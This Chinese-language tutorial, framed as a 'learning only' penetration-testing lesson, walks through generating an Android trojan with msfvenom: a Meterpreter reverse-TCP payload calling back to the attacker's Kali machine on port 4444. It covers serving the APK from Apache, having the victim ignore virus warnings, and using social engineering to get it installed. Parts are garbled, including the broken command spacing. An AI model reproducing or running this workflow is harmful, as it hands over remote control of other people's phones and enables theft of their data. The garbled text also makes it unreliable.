网络安全渗透测试的流程和方法

核心提示课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、你将掌握:配置渗透网络和生成安卓木马!网络配置1、首先保证所有的设备都连接到同一个局域网下。在现实生活中,黑客通常找寻免费的公共Wi-

课前声明:

1.此分享仅供学习交流。请自觉遵守法律法规!

2.搜索:Kali和编程,了解更多网络攻防干货!

3.你会掌握:配置渗透网络,生成安卓木马!

网络结构

1.首先,确保所有设备都连接到同一个局域网。

在现实生活中,黑客通常会寻找免费的公共Wi-Fi,以确保有足够多的Android手机供其渗透。所以如无必要尽量不要使用公共Wi-Fi。

操作细节:

Kali建立网络环境

然后点击“确定”。

2.受害者安卓手机的网络设置

将Android手机连接到kali虚拟机连接的局域网,并检查其ip地址。

3.检查kali虚拟机的ip地址是否和安卓手机在同一个局域网。

在kali终端输入:ifconfig。

4.生成Android木马

让所有安卓手机。

在kali中生成一个Android木马,在终端输入命令:

MSF venom-p andr iod/meter preter/reverse _ TCP lhost = 192 . 168 . 0 . 102 lport = 4444 R >/root/shell . apk

使用msfvenom生成一个meterpreter的Android端反向有效载荷。

–p添加有效载荷有效载荷。

有效载荷很多。这个软件是根据对应的有效载荷生成对应平台的后门,所以只有选择正确的有效载荷,填写正确的IP,PORT才能生成对应语言和平台的后门!

上述命令指定返回tcp有效负载。

Lhost指定要监听的地址,即本地kali虚拟机的ip地址。

Lport指定本地监听的端口号。

5.操作的详细说明:

使用msfvenom生成一个meterpreter的Android端反向有效载荷。

因为我们只是渗透测试,攻击环境并不理想,有兴趣的可以用社会工程来诱导用户下载安装apk文件。接下来,只需打开apach服务,让Android主机自动安装apk文件。

6.在安卓手机浏览器地址栏输入:192.168.0.102/shell.apk,kali虚拟机的IP地址/shell。apk .并下载apk木马文件。

即使警告有病毒风险也没多大关系。继续安装成功就行了。

 
友情链接
鄂ICP备19019357号-22